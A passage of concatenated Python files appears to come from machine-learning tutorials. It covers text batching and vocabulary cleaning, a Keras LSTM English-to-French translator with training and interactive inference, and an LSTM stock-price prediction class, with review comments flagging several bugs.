    arr: Array you want to make batches from
    batch_size: Batch size, the number of sequences per batch
    n_steps: Number of sequence steps per batch
    '''
    window = batch_size * n_steps
    usable = (len(arr) // window) * window
    grid = arr[:usable].reshape((batch_size, -1))
    total_cols = grid.shape[1]
    while True:
        for start in range(0, total_cols, n_steps):
            x = grid[:, start:start + n_steps]
            shifted = grid[:, start + 1:start + n_steps + 1]
            # zero-pad the targets when the shift runs off the end
            y = np.zeros(x.shape, dtype=shifted.dtype)
            y[:, :shifted.shape[1]] = shifted
            yield x.reshape(1, *x.shape), y.reshape(1, *y.shape)
def get_data(arr, n_seq, look_forward):
    """Slice *arr* into consecutive windows of length `n_seq` with targets
    shifted by `look_forward`.

    Returns (X, Y), each shaped (1, n_samples, n_seq).  Any trailing window
    whose target would run past the end of the array is left zero-filled
    (the loop stops at the first short slice).
    """
    n_samples = len(arr) // n_seq
    X = np.zeros((n_seq, n_samples))
    Y = np.zeros((n_seq, n_samples))
    for col, offset in enumerate(range(0, n_samples * n_seq, n_seq)):
        window = arr[offset:offset + n_seq]
        target = arr[offset + look_forward:offset + n_seq + look_forward]
        if len(window) != n_seq or len(target) != n_seq:
            break  # target overruns the array; leave remaining columns zero
        X[:, col] = window
        Y[:, col] = target
    return (X.T.reshape(1, n_samples, n_seq),
            Y.T.reshape(1, n_samples, n_seq))
def get_text(path, files=["carroll-alice.txt", "text.txt", "text8.txt"]):
    """Load and normalize the corpus files under *path*.

    Lowercases, strips punctuation, collapses whitespace, spells out digit
    tokens with inflect, replaces out-of-vocabulary words with UNK, then
    shrinks the module-level vocab to the words actually present and saves
    it.  Returns the cleaned corpus as one space-joined string.

    NOTE: `files` is a mutable default argument; it is never mutated here,
    so this is harmless, but a tuple would be safer.
    NOTE: this rebinds the global `vocab` to a *set*, while the module
    initialization above leaves it a sorted list — callers relying on
    ordering should re-sort after calling this.
    """
    global vocab
    global word2int
    global int2word
    text = ""
    # NOTE(review): this assignment is dead — `file` is overwritten by the loop
    file = files[0]
    for file in tqdm.tqdm(files, "Loading data"):
        file = os.path.join(path, file)
        with open(file, encoding="utf8") as f:
            text += f.read().lower()
    # drop punctuation characters entirely
    punc = set(punctuation)
    text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
    # normalize all whitespace (tabs, newlines, ...) to single spaces
    for ws in whitespace:
        text = text.replace(ws, " ")
    text = text.split()
    co = 0
    # set membership is O(1) vs O(n) on the sorted list
    vocab_set = set(vocab)
    for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
        # convert digits to words
        # (i.e '7' to 'seven')
        if text[i].isdigit():
            text[i] = p.number_to_words(text[i])
        # compare_nouns
        # compare_adjs
        # compare_verbs
        if text[i] not in vocab_set:
            text[i] = UNK
            co += 1
    # update vocab, intersection of words
    print("vocab length:", len(vocab))
    vocab = vocab_set & set(text)
    print("vocab length after update:", len(vocab))
    save_vocab(vocab)
    print("Number of unks:", co)
    return ' '.join(text)
from train import create_model, get_data, split_data, LSTM_UNITS, np, to_categorical, Tokenizer, pad_sequences, pickle
def tokenize(x, tokenizer=None):
    """Tokenize x.

    :param x: List of sentences/strings to be tokenized
    :param tokenizer: optional pre-fitted tokenizer to reuse; when omitted
        a fresh Tokenizer is fitted on x
    :return: Tuple of (tokenized x data, tokenizer used to tokenize x)
    """
    if not tokenizer:
        tokenizer = Tokenizer()
        tokenizer.fit_on_texts(x)
    return tokenizer.texts_to_sequences(x), tokenizer
def predict_sequence(enc, dec, source, n_steps, docoder_num_tokens):
    """Generate target given source sequence, this function can be used
    after the model is trained to generate a target sequence given a source
    sequence.

    Greedy decoding: the encoder summarizes `source` into its states, then
    the decoder is stepped `n_steps` times, feeding back the argmax token
    one-hot encoded each step.

    NOTE(review): the one-hot width here is `n_steps`, not the decoder
    vocabulary size, and `docoder_num_tokens` (sic) is unused — this only
    works if the decoder input dimension happens to equal n_steps; verify
    against create_model's shapes.
    """
    # encode
    state = enc.predict(source)
    # start of sequence input
    target_seq = np.zeros((1, 1, n_steps))
    # collect predictions
    output = []
    for t in range(n_steps):
        # predict next char
        yhat, h, c = dec.predict([target_seq] + state)
        # store predictions
        y = yhat[0, 0, :]
        sampled_token_index = np.argmax(y)
        output.append(sampled_token_index)
        # update state
        state = [h, c]
        # update target sequence
        target_seq = np.zeros((1, 1, n_steps))
        target_seq[0, 0] = to_categorical(sampled_token_index, num_classes=n_steps)
    return np.array(output)
def logits_to_text(logits, index_to_words):
    """
    Turn a sequence of predicted indices into text.

    :param logits: iterable of predicted word indices
    :param index_to_words: mapping from index to word
    :return: String that represents the text of the logits
    """
    words = (index_to_words[i] for i in logits)
    return ' '.join(words)
# interactive translation loop: rebuild the tokenizers/model, load trained
# weights, then translate whatever the user types (Ctrl-C to quit)
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
# the saved tokenizers override the freshly fitted ones for consistency
# with the trained weights
X_tk = pickle.load(open("X_tk.pickle", "rb"))
y_tk = pickle.load(open("y_tk.pickle", "rb"))
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
model.load_weights("results/eng_fra_v1_17568.086.h5")
while True:
    text = input("> ")
    tokenized = np.array(tokenize([text], tokenizer=X_tk)[0])
    print(tokenized.shape)
    # pad to the training-time source length, then shape (1, 1, seq_len)
    X = pad_sequences(tokenized, maxlen=source_sequence_length, padding="post")
    X = X.reshape((1, 1, X.shape[-1]))
    print(X.shape)
    # X = to_categorical(X, num_classes=len(X_tk.word_index) + 1)
    print(X.shape)
    sequence = predict_sequence(enc, dec, X, target_sequence_length, source_sequence_length)
    result = logits_to_text(sequence, y_tk.index_word)
    print(result)
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, LSTM, GRU, Dense, Embedding, Activation, Dropout, Sequential, RepeatVector
from tensorflow.keras.layers import TimeDistributed
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical, plot_model
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import numpy as np
import matplotlib.pyplot as plt
import os
import pickle
# hyper parameters for the seq2seq English->French translator
BATCH_SIZE = 32   # sentence pairs per training batch
EPOCHS = 10       # full passes over the training pairs
LSTM_UNITS = 128  # latent dimension of the encoder/decoder LSTMs
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
    """Simple encoder-decoder: an LSTM encodes the source, RepeatVector
    feeds its summary to each decoder step, and a TimeDistributed softmax
    predicts one French word per output position.

    Bug fix: `input_shape=...` and `return_sequences=True` were previously
    passed to `Sequential.add(...)` instead of to the `LSTM(...)`
    constructors, which raises a TypeError — they belong inside the layer.
    Note: `english_vocab_size` is unused; kept for signature compatibility.
    """
    model = Sequential()
    # encoder: consume the source sequence into a single state vector
    model.add(LSTM(LSTM_UNITS, input_shape=input_shape[1:]))
    # repeat the encoding once per output timestep for the decoder
    model.add(RepeatVector(output_sequence_length))
    model.add(LSTM(LSTM_UNITS, return_sequences=True))
    model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
    model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
    return model
def create_model(num_encoder_tokens, num_decoder_tokens, latent_dim):
    """Build a teacher-forced seq2seq LSTM and its inference halves.

    Returns (model, encoder_model, decoder_model):
    - model: trained on ([encoder_inputs, decoder_inputs] -> decoder targets)
    - encoder_model: source sequence -> [state_h, state_c]
    - decoder_model: ([prev-token input] + states) -> (softmax, new states)
    """
    # define an input sequence
    encoder_inputs = Input(shape=(None, num_encoder_tokens))
    encoder = LSTM(latent_dim, return_state=True)
    # define the encoder output
    encoder_outputs, state_h, state_c = encoder(encoder_inputs)
    # only the final states are passed on; encoder_outputs is discarded
    encoder_states = [state_h, state_c]
    # encoder inference model
    encoder_model = Model(encoder_inputs, encoder_states)
    # set up the decoder now
    decoder_inputs = Input(shape=(None, num_decoder_tokens))
    decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
    # training path: decoder starts from the encoder's final states
    decoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)
    decoder_dense = Dense(num_decoder_tokens, activation="softmax")
    decoder_outputs = decoder_dense(decoder_outputs)
    # decoder inference model
    decoder_state_input_h = Input(shape=(latent_dim,))
    decoder_state_input_c = Input(shape=(latent_dim,))
    decoder_state_inputs = [decoder_state_input_h, decoder_state_input_c]
    model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
    # inference path reuses decoder_lstm with externally supplied states
    decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_state_inputs)
    decoder_states = [state_h, state_c]
    # NOTE(review): the inference decoder outputs here skip decoder_dense,
    # so they are raw LSTM activations, not softmax probabilities — confirm
    # against predict_sequence's expectations
    decoder_model = Model([decoder_inputs] + decoder_state_inputs, [decoder_outputs] + decoder_states)
    return model, encoder_model, decoder_model
def get_batches(X, y, X_tk, y_tk, source_sequence_length, target_sequence_length, batch_size=BATCH_SIZE):
    """Endless batch generator for the seq2seq model.

    Yields ([encoder_data, decoder_data], decoder_input_data) with the
    sequence arrays expanded to rank 3 via an added axis (integer ids, not
    one-hot — the one-hot path is commented out below).
    NOTE(review): num_encoder_tokens / num_decoder_tokens are computed but
    only used by the commented-out one-hot code.
    """
    # get total number of words in X
    num_encoder_tokens = len(X_tk.word_index) + 1
    # get max number of words in all sentences in y
    num_decoder_tokens = len(y_tk.word_index) + 1
    while True:
        for j in range(0, len(X), batch_size):
            encoder_input_data = X[j: j+batch_size]
            decoder_input_data = y[j: j+batch_size]
            # redefine batch size
            # it may differ (in last batch of dataset)
            batch_size = encoder_input_data.shape[0]
            # one-hot everything
            # decoder_target_data = np.zeros((batch_size, num_decoder_tokens, target_sequence_length), dtype=np.uint8)
            # encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens), dtype=np.uint8)
            # decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens), dtype=np.uint8)
            encoder_data = np.expand_dims(encoder_input_data, axis=1)
            decoder_data = np.expand_dims(decoder_input_data, axis=1)
            # for i, sequence in enumerate(decoder_input_data):
            # for t, word_index in enumerate(sequence):
            # # skip the first
            # if t > 0:
            # decoder_target_data[i, t-1, word_index] = 1
            # decoder_data[i, t, word_index] = 1
            # for i, sequence in enumerate(encoder_input_data):
            # for t, word_index in enumerate(sequence):
            # encoder_data[i, t, word_index] = 1
            yield ([encoder_data, decoder_data], decoder_input_data)
def get_data(file):
    """Load a tab-separated parallel corpus (source<TAB>target per line).

    Each target sentence gets an ``<eos>`` marker appended.  Both sides are
    tokenized with fresh Keras Tokenizers and post-padded to their maximum
    sequence lengths.

    :return: (X, y, X_tk, y_tk, source_sequence_length, target_sequence_length)

    Fixes: the corpus file is now closed via a context manager; the dead
    local `output_sentence_input` (built but never used) is removed; the
    builtin-shadowing name `input` is renamed.
    """
    X = []
    y = []
    # loading the data
    with open(file, encoding="utf-8") as corpus:
        for line in corpus:
            if "\t" not in line:
                continue  # skip lines without a translation column
            # split by tab: source sentence, then its translation
            parts = line.strip().split("\t")
            source_sentence = parts[0]
            # mark end-of-sentence so the decoder can learn when to stop
            target_sentence = f"{parts[1]} <eos>"
            X.append(source_sentence)
            y.append(target_sentence)
    # tokenize data
    X_tk = Tokenizer()
    X_tk.fit_on_texts(X)
    X = X_tk.texts_to_sequences(X)
    y_tk = Tokenizer()
    y_tk.fit_on_texts(y)
    y = y_tk.texts_to_sequences(y)
    # define the max sequence length for X
    source_sequence_length = max(len(x) for x in X)
    # define the max sequence length for y
    target_sequence_length = max(len(y_) for y_ in y)
    # padding sequences (zeros appended after each sentence)
    X = pad_sequences(X, maxlen=source_sequence_length, padding="post")
    y = pad_sequences(y, maxlen=target_sequence_length, padding="post")
    return X, y, X_tk, y_tk, source_sequence_length, target_sequence_length
def shuffle_data(X, y):
    """
    Shuffle X & y in place with the same permutation, preserving pair order.

    The RNG state is snapshotted before the first shuffle and restored
    before the second so both arrays receive identical swaps.
    """
    snapshot = np.random.get_state()
    np.random.shuffle(X)
    # replay the exact same permutation on y
    np.random.set_state(snapshot)
    np.random.shuffle(y)
    return X, y
def split_data(X, y, train_split_rate=0.2):
    """Shuffle X/y together, then split off the leading chunk as training data.

    NOTE(review): train_split_rate=0.2 means only 20% of the data lands in the
    training split and 80% in the second split — confirm this is intentional.
    """
    X, y = shuffle_data(X, y)
    n_train = round(len(X) * train_split_rate)
    X_train, X_rest = X[:n_train], X[n_train:]
    y_train, y_rest = y[:n_train], y[n_train:]
    return X_train, y_train, X_rest, y_rest
if __name__ == "__main__":
    # load the data (padded integer sequences + fitted tokenizers)
    X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
    # save tokenizers so inference scripts can reuse the same vocabularies
    pickle.dump(X_tk, open("X_tk.pickle", "wb"))
    pickle.dump(y_tk, open("y_tk.pickle", "wb"))
    # shuffle & split data
    X_train, y_train, X_test, y_test = split_data(X, y)
    # construct the models (combined training model plus encoder/decoder halves)
    model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
    plot_model(model, to_file="model.png")
    plot_model(enc, to_file="enc.png")
    plot_model(dec, to_file="dec.png")
    model.summary()
    model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
    if not os.path.isdir("results"):
        os.mkdir("results")
    # keep only the checkpoint with the lowest validation loss
    checkpointer = ModelCheckpoint("results/eng_fra_v1_{val_loss:.3f}.h5", save_best_only=True, verbose=2)
    # train the model
    # NOTE(review): fit_generator is deprecated in recent Keras; model.fit
    # accepts generators directly — confirm the installed TF version.
    model.fit_generator(get_batches(X_train, y_train, X_tk, y_tk, source_sequence_length, target_sequence_length),
                        validation_data=get_batches(X_test, y_test, X_tk, y_tk, source_sequence_length, target_sequence_length),
                        epochs=EPOCHS, steps_per_epoch=(len(X_train) // BATCH_SIZE),
                        validation_steps=(len(X_test) // BATCH_SIZE),
                        callbacks=[checkpointer])
    print("[+] Model trained.")
    model.save("results/eng_fra_v1.h5")
    print("[+] Model saved.")
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import GRU, Input, Dense, TimeDistributed, Activation, RepeatVector, Bidirectional, Flatten
from tensorflow.keras.layers import Dropout, LSTM
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import sparse_categorical_crossentropy
import collections
import numpy as np
LSTM_UNITS = 128
def get_data(file):
    """Read a tab-separated parallel corpus and return (sources, targets) lists."""
    sources, targets = [], []
    # loading the data, one "source<TAB>target" pair per line
    for raw_line in open(file, encoding="utf-8"):
        # skip lines without a tab separator
        if "\t" not in raw_line:
            continue
        source, target = raw_line.strip().split("\t")[:2]
        sources.append(source)
        targets.append(target)
    return sources, targets
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
    """Build a simple encoder-decoder model: an LSTM encoder collapsed to one
    vector, repeated `output_sequence_length` times, decoded by a second LSTM
    with a per-timestep softmax over the French vocabulary.

    NOTE(review): `english_vocab_size` is accepted for signature symmetry but
    is not used by the architecture.
    """
    model = Sequential([
        LSTM(LSTM_UNITS, input_shape=input_shape[1:]),
        RepeatVector(output_sequence_length),
        LSTM(LSTM_UNITS, return_sequences=True),
        TimeDistributed(Dense(french_vocab_size, activation="softmax")),
    ])
    model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
    return model
def tokenize(x):
    """Fit a Keras Tokenizer on `x` and convert it to integer sequences.

    :param x: List of sentences/strings to be tokenized
    :return: Tuple of (tokenized x data, tokenizer used to tokenize x)
    """
    tokenizer = Tokenizer()
    tokenizer.fit_on_texts(x)
    sequences = tokenizer.texts_to_sequences(x)
    return sequences, tokenizer
def pad(x, length=None):
    """Post-pad every sequence in `x` to `length` (or to the longest sequence
    when `length` is None).

    :param x: List of sequences.
    :param length: Length to pad the sequence to, or None for the max in x.
    :return: Padded numpy array of sequences
    """
    return pad_sequences(x, maxlen=length, padding='post')
def preprocess(x, y):
    """Tokenize and pad both corpora for training.

    :param x: Feature list of sentences
    :param y: Label list of sentences
    :return: Tuple of (Preprocessed x, Preprocessed y, x tokenizer, y tokenizer)
    """
    tokenized_x, x_tk = tokenize(x)
    tokenized_y, y_tk = tokenize(y)
    padded_x = pad(tokenized_x)
    padded_y = pad(tokenized_y)
    # sparse_categorical_crossentropy expects the labels in 3 dimensions
    padded_y = padded_y.reshape(*padded_y.shape, 1)
    return padded_x, padded_y, x_tk, y_tk
def logits_to_text(logits, tokenizer):
    """Turn per-timestep logits into a space-joined sentence via the tokenizer.

    :param logits: 2-D array of logits, one row per timestep
    :param tokenizer: Keras Tokenizer fit on the labels
    :return: String that represents the text of the logits
    """
    # invert word -> index into index -> word; index 0 is the padding token
    index_to_word = {index: word for word, index in tokenizer.word_index.items()}
    index_to_word[0] = '<PAD>'
    predicted_indices = np.argmax(logits, 1)
    return ' '.join(index_to_word[idx] for idx in predicted_indices)
if __name__ == "__main__":
    # load the raw parallel corpus
    X, y = get_data("ara.txt")
    # corpus statistics
    english_words = [word for sentence in X for word in sentence.split()]
    french_words = [word for sentence in y for word in sentence.split()]
    english_words_counter = collections.Counter(english_words)
    french_words_counter = collections.Counter(french_words)
    print('{} English words.'.format(len(english_words)))
    print('{} unique English words.'.format(len(english_words_counter)))
    print('10 Most common words in the English dataset:')
    print('"' + '" "'.join(list(zip(*english_words_counter.most_common(10)))[0]) + '"')
    print()
    print('{} French words.'.format(len(french_words)))
    print('{} unique French words.'.format(len(french_words_counter)))
    print('10 Most common words in the French dataset:')
    print('"' + '" "'.join(list(zip(*french_words_counter.most_common(10)))[0]) + '"')
    # Tokenize Example output
    text_sentences = [
        'The quick brown fox jumps over the lazy dog .',
        'By Jove , my quick study of lexicography won a prize .',
        'This is a short sentence .']
    text_tokenized, text_tokenizer = tokenize(text_sentences)
    print(text_tokenizer.word_index)
    print()
    for sample_i, (sent, token_sent) in enumerate(zip(text_sentences, text_tokenized)):
        print('Sequence {} in x'.format(sample_i + 1))
        print(' Input: {}'.format(sent))
        print(' Output: {}'.format(token_sent))
    # Pad Tokenized output
    test_pad = pad(text_tokenized)
    for sample_i, (token_sent, pad_sent) in enumerate(zip(text_tokenized, test_pad)):
        print('Sequence {} in x'.format(sample_i + 1))
        print(' Input: {}'.format(np.array(token_sent)))
        print(' Output: {}'.format(pad_sent))
    preproc_english_sentences, preproc_french_sentences, english_tokenizer, french_tokenizer =\
        preprocess(X, y)
    max_english_sequence_length = preproc_english_sentences.shape[1]
    max_french_sequence_length = preproc_french_sentences.shape[1]
    english_vocab_size = len(english_tokenizer.word_index)
    french_vocab_size = len(french_tokenizer.word_index)
    print('Data Preprocessed')
    print("Max English sentence length:", max_english_sequence_length)
    print("Max French sentence length:", max_french_sequence_length)
    print("English vocabulary size:", english_vocab_size)
    print("French vocabulary size:", french_vocab_size)
    # pad English input up to the French sequence length and add a feature axis
    tmp_x = pad(preproc_english_sentences, preproc_french_sentences.shape[1])
    tmp_x = tmp_x.reshape((-1, preproc_french_sentences.shape[-2], 1))
    print("tmp_x.shape:", tmp_x.shape)
    print("preproc_french_sentences.shape:", preproc_french_sentences.shape)
    # Train the neural network
    # increased passed index length by 1 to avoid index error
    encdec_rnn_model = create_encdec_model(
        tmp_x.shape,
        preproc_french_sentences.shape[1],
        len(english_tokenizer.word_index)+1,
        len(french_tokenizer.word_index)+1)
    print(encdec_rnn_model.summary())
    # reduced batch size
    encdec_rnn_model.fit(tmp_x, preproc_french_sentences, batch_size=256, epochs=3, validation_split=0.2)
    # Print prediction(s)
    print(logits_to_text(encdec_rnn_model.predict(tmp_x[1].reshape((1, tmp_x[1].shape[0], 1, )))[0], french_tokenizer))
    print("Original text and translation:")
    print(X[1])
    print(y[1])
    # OPTIONAL: Train and Print prediction(s)
    print("="*50)
    # Print prediction(s)
    # BUG FIX: the `[0]` used to index the reshaped *input* (collapsing it back
    # to 2-D before predict) instead of the model output; moved it after
    # predict(), matching the sample-1 call above.
    print(logits_to_text(encdec_rnn_model.predict(tmp_x[10].reshape((1, tmp_x[1].shape[0], 1, )))[0], french_tokenizer))
    print("Original text and translation:")
    print(X[10])
    print(y[10])
    # OPTIONAL: Train and Print prediction(s)
from tensorflow.keras.layers import LSTM, Dense, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.metrics import mean_absolute_error, mean_squared_error, accuracy_score
import os
import time
import glob
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from utils import classify, shift, create_model, load_data
class PricePrediction:
    """A Class utility to train and predict price of stocks/cryptocurrencies/trades
    using keras model"""

    def __init__(self, ticker_name, **kwargs):
        """
        :param ticker_name (str): ticker name, e.g. aapl, nflx, etc.
        :param n_steps (int): sequence length used to predict, default is 60
        :param price_column (str): the name of column that contains price predicted, default is 'adjclose'
        :param feature_columns (list): a list of feature column names used to train the model,
            default is ['adjclose', 'volume', 'open', 'high', 'low']
        :param target_column (str): target column name, default is 'future'
        :param lookup_step (int): the future lookup step to predict, default is 1 (e.g. next day)
        :param shuffle (bool): whether to shuffle the dataset, default is True
        :param verbose (int): verbosity level, default is 1
        ==========================================
        Model parameters
        :param n_layers (int): number of recurrent neural network layers, default is 3
        :param cell (keras.layers.RNN): RNN cell used to train keras model, default is LSTM
        :param units (int): number of units of cell, default is 256
        :param dropout (float): dropout rate ( from 0 to 1 ), default is 0.3
        ==========================================
        Training parameters
        :param batch_size (int): number of samples per gradient update, default is 64
        :param epochs (int): number of epochs, default is 100
        :param optimizer (str, keras.optimizers.Optimizer): optimizer used to train, default is 'adam'
        :param loss (str, function): loss function used to minimize during training,
            default is 'mae'
        :param test_size (float): test size ratio from 0 to 1, default is 0.15
        """
        self.ticker_name = ticker_name
        self.n_steps = kwargs.get("n_steps", 60)
        self.price_column = kwargs.get("price_column", 'adjclose')
        self.feature_columns = kwargs.get("feature_columns", ['adjclose', 'volume', 'open', 'high', 'low'])
        self.target_column = kwargs.get("target_column", "future")
        self.lookup_step = kwargs.get("lookup_step", 1)
        self.shuffle = kwargs.get("shuffle", True)
        self.verbose = kwargs.get("verbose", 1)
        self.n_layers = kwargs.get("n_layers", 3)
        self.cell = kwargs.get("cell", LSTM)
        self.units = kwargs.get("units", 256)
        self.dropout = kwargs.get("dropout", 0.3)
        self.batch_size = kwargs.get("batch_size", 64)
        self.epochs = kwargs.get("epochs", 100)
        self.optimizer = kwargs.get("optimizer", "adam")
        self.loss = kwargs.get("loss", "mae")
        self.test_size = kwargs.get("test_size", 0.15)
        # create unique model name
        self._update_model_name()
        # runtime attributes
        self.model_trained = False
        self.data_loaded = False
        self.model_created = False
        # test price values
        self.test_prices = None
        # predicted price values for the test set
        self.y_pred = None
        # prices converted to buy/sell classes
        self.classified_y_true = None
        # predicted prices converted to buy/sell classes
        self.classified_y_pred = None
        # most recent price
        self.last_price = None
        # make folders if does not exist
        if not os.path.isdir("results"):
            os.mkdir("results")
        if not os.path.isdir("logs"):
            os.mkdir("logs")
        if not os.path.isdir("data"):
            os.mkdir("data")

    def create_model(self):
        """Construct and compile the keras model"""
        self.model = create_model(input_length=self.n_steps,
                                  units=self.units,
                                  cell=self.cell,
                                  dropout=self.dropout,
                                  n_layers=self.n_layers,
                                  loss=self.loss,
                                  optimizer=self.optimizer)
        self.model_created = True
        if self.verbose > 0:
            print("[+] Model created")

    def train(self, override=False):
        """Train the keras model using self.checkpointer and self.tensorboard as keras callbacks.
        If model created already trained, this method will load the weights instead of training from scratch.
        Note that this method will create the model and load data if not called before."""
        # if model isn't created yet, create it
        if not self.model_created:
            self.create_model()
        # if data isn't loaded yet, load it
        if not self.data_loaded:
            self.load_data()
        # if the model already exists and trained, just load the weights and return
        # but if override is True, then just skip loading weights
        if not override:
            model_name = self._model_exists()
            if model_name:
                self.model.load_weights(model_name)
                self.model_trained = True
                if self.verbose > 0:
                    print("[*] Model weights loaded")
                return
        if not os.path.isdir("results"):
            os.mkdir("results")
        if not os.path.isdir("logs"):
            os.mkdir("logs")
        model_filename = self._get_model_filename()
        self.checkpointer = ModelCheckpoint(model_filename, save_best_only=True, verbose=1)
        # BUG FIX: the log dir used a hard-coded backslash (f"logs\{...}"),
        # which only works on Windows; os.path.join is portable.
        self.tensorboard = TensorBoard(log_dir=os.path.join("logs", self.model_name))
        self.history = self.model.fit(self.X_train, self.y_train,
                                      batch_size=self.batch_size,
                                      epochs=self.epochs,
                                      validation_data=(self.X_test, self.y_test),
                                      callbacks=[self.checkpointer, self.tensorboard],
                                      verbose=1)
        self.model_trained = True
        if self.verbose > 0:
            print("[+] Model trained")

    def predict(self, classify=False):
        """Predicts next price for the step self.lookup_step.
        when classify is True, returns 0 for sell and 1 for buy"""
        if not self.model_trained:
            raise RuntimeError("Model is not trained yet, call model.train() first.")
        # reshape to fit the model input
        # NOTE(review): this reshape swaps the two axes without transposing the
        # underlying data — it mirrors the reshape done in load_data(), so
        # training and inference stay consistent; confirm this is intended.
        last_sequence = self.last_sequence.reshape((self.last_sequence.shape[1], self.last_sequence.shape[0]))
        # expand dimension to make a batch of one
        last_sequence = np.expand_dims(last_sequence, axis=0)
        predicted_price = self.column_scaler[self.price_column].inverse_transform(self.model.predict(last_sequence))[0][0]
        if classify:
            # buy (1) when the predicted price is above the most recent price
            last_price = self.get_last_price()
            return 1 if last_price < predicted_price else 0
        else:
            return predicted_price

    def load_data(self):
        """Loads and preprocess data"""
        filename, exists = self._df_exists()
        if exists:
            # if the updated dataframe already exists in disk, load it
            self.ticker = pd.read_csv(filename)
            ticker = self.ticker
            if self.verbose > 0:
                print("[*] Dataframe loaded from disk")
        else:
            ticker = self.ticker_name
        result = load_data(ticker, n_steps=self.n_steps, lookup_step=self.lookup_step,
                           shuffle=self.shuffle, feature_columns=self.feature_columns,
                           price_column=self.price_column, test_size=self.test_size)
        # extract data
        self.df = result['df']
        self.X_train = result['X_train']
        self.X_test = result['X_test']
        self.y_train = result['y_train']
        self.y_test = result['y_test']
        self.column_scaler = result['column_scaler']
        self.last_sequence = result['last_sequence']
        if self.shuffle:
            self.unshuffled_X_test = result['unshuffled_X_test']
            self.unshuffled_y_test = result['unshuffled_y_test']
        else:
            self.unshuffled_X_test = self.X_test
            self.unshuffled_y_test = self.y_test
        self.original_X_test = self.unshuffled_X_test.reshape((self.unshuffled_X_test.shape[0], self.unshuffled_X_test.shape[2], -1))
        self.data_loaded = True
        if self.verbose > 0:
            print("[+] Data loaded")
        # save the dataframe to disk
        self.save_data()

    def get_last_price(self):
        """Returns the last price ( i.e the most recent price )"""
        if not self.last_price:
            self.last_price = float(self.df[self.price_column].tail(1))
        return self.last_price

    def get_test_prices(self):
        """Returns test prices. Note that this function won't return the whole sequences,
        instead, it'll return only the last value of each sequence"""
        if self.test_prices is None:
            current = np.squeeze(self.column_scaler[self.price_column].inverse_transform([[ v[-1][0] for v in self.original_X_test ]]))
            future = np.squeeze(self.column_scaler[self.price_column].inverse_transform(np.expand_dims(self.unshuffled_y_test, axis=0)))
            self.test_prices = np.array(list(current) + [future[-1]])
        return self.test_prices

    def get_y_pred(self):
        """Get predicted values of the testing set of sequences ( y_pred )"""
        if not self.model_trained:
            raise RuntimeError("Model is not trained yet, call model.train() first.")
        if self.y_pred is None:
            self.y_pred = np.squeeze(self.column_scaler[self.price_column].inverse_transform(self.model.predict(self.unshuffled_X_test)))
        return self.y_pred

    def get_y_true(self):
        """Returns original y testing values ( y_true )"""
        test_prices = self.get_test_prices()
        return test_prices[1:]

    def _get_shifted_y_true(self):
        """Returns original y testing values shifted by -1.
        This function is useful for converting to a classification problem"""
        test_prices = self.get_test_prices()
        return test_prices[:-1]

    def _calc_classified_prices(self):
        """Convert regression predictions to a classification predictions ( buy or sell )
        and set results to self.classified_y_pred for predictions and self.classified_y_true
        for true prices"""
        if self.classified_y_true is None or self.classified_y_pred is None:
            current_prices = self._get_shifted_y_true()
            future_prices = self.get_y_true()
            predicted_prices = self.get_y_pred()
            self.classified_y_true = list(map(classify, current_prices, future_prices))
            self.classified_y_pred = list(map(classify, current_prices, predicted_prices))

    # some metrics
    def get_MAE(self):
        """Calculates the Mean-Absolute-Error metric of the test set"""
        if not self.model_trained:
            raise RuntimeError("Model is not trained yet, call model.train() first.")
        y_true = self.get_y_true()
        y_pred = self.get_y_pred()
        return mean_absolute_error(y_true, y_pred)

    def get_MSE(self):
        """Calculates the Mean-Squared-Error metric of the test set"""
        if not self.model_trained:
            raise RuntimeError("Model is not trained yet, call model.train() first.")
        y_true = self.get_y_true()
        y_pred = self.get_y_pred()
        return mean_squared_error(y_true, y_pred)

    def get_accuracy(self):
        """Calculates the accuracy after adding classification approach (buy/sell)"""
        if not self.model_trained:
            raise RuntimeError("Model is not trained yet, call model.train() first.")
        self._calc_classified_prices()
        return accuracy_score(self.classified_y_true, self.classified_y_pred)

    def plot_test_set(self):
        """Plots test data"""
        future_prices = self.get_y_true()
        predicted_prices = self.get_y_pred()
        plt.plot(future_prices, c='b')
        plt.plot(predicted_prices, c='r')
        plt.xlabel("Days")
        plt.ylabel("Price")
        plt.legend(["Actual Price", "Predicted Price"])
        plt.show()

    def save_data(self):
        """Saves the updated dataframe if it does not exist"""
        filename, exists = self._df_exists()
        if not exists:
            self.df.to_csv(filename)
            if self.verbose > 0:
                print("[+] Dataframe saved")

    def _update_model_name(self):
        # encode the configuration into a unique, date-stamped model name
        stock = self.ticker_name.replace(" ", "_")
        feature_columns_str = ''.join([ c[0] for c in self.feature_columns ])
        time_now = time.strftime("%Y-%m-%d")
